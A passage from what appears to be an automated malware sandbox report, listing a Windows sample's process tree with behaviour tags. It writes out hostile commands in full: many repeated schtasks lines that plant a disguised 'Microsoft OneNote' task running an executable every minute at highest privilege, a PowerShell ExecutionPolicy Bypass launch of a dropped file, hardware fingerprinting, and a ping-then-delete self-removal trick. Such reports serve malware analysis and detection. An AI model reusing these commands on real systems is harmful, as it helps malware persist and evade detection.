                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                            5⤵
                                                                                                              PID:644
                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                              "wmic" path win32_VideoController get name
                                                                                                              5⤵
                                                                                                              • Detects videocard installed
                                                                                                              PID:3176
                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe" && pause
                                                                                                              5⤵
                                                                                                                PID:4852
                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                  ping localhost
                                                                                                                  6⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:1408
                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                          2⤵
                                                                                                            PID:2580
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                              3⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:4832
                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                            2⤵
                                                                                                              PID:1576
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                3⤵
                                                                                                                  PID:3496
                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                2⤵
                                                                                                                  PID:4584
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                    3⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:2956
                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                  2⤵
                                                                                                                    PID:2420
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                      3⤵
                                                                                                                        PID:1564
                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                      2⤵
                                                                                                                        PID:4888
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                          3⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:4600
                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                        2⤵
                                                                                                                          PID:3132
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                            3⤵
                                                                                                                              PID:852
                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                            2⤵
                                                                                                                              PID:404
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                3⤵
                                                                                                                                  PID:2252
                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                2⤵
                                                                                                                                  PID:4764
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                    3⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:4468
                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                  2⤵
                                                                                                                                    PID:3144
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                      3⤵
                                                                                                                                        PID:3956
                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                      2⤵
                                                                                                                                        PID:3892
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                          3⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:1968
                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                        2⤵
                                                                                                                                          PID:1388
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                            3⤵
                                                                                                                                              PID:4136
                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                            2⤵
                                                                                                                                              PID:1032
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                3⤵
                                                                                                                                                  PID:3820
                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                2⤵
                                                                                                                                                  PID:1316
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                    3⤵
                                                                                                                                                      PID:628
                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1488
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1576
                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3508
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4784
                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4428
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3980
                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2376
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1832
                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2432
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:440
                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2444
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4616
                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2956
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4060
                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4460
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1020
                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3128
                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                        PID:2160
                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2376
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:1848
                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4136
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:392
                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3620
                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:1812
                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2444
                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:4284
                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:212
                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4784
                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4976
                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:764
                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1680
                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:836
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2436
                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:180
                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4652
                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:2636
                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:4784
                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3164
                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5112
                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4968
                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:4972
                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:916
                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4356
                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2884
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:3144
                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:2112
                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:2760
                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2804
                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2376
                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:2368
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3988
                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4460
                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                  PID:1544
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"' & exit
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:3408
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"'
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    PID:3880
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:1616
                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:3240
                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:3856
                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:1028
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:1216
                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3044
                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5008
                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
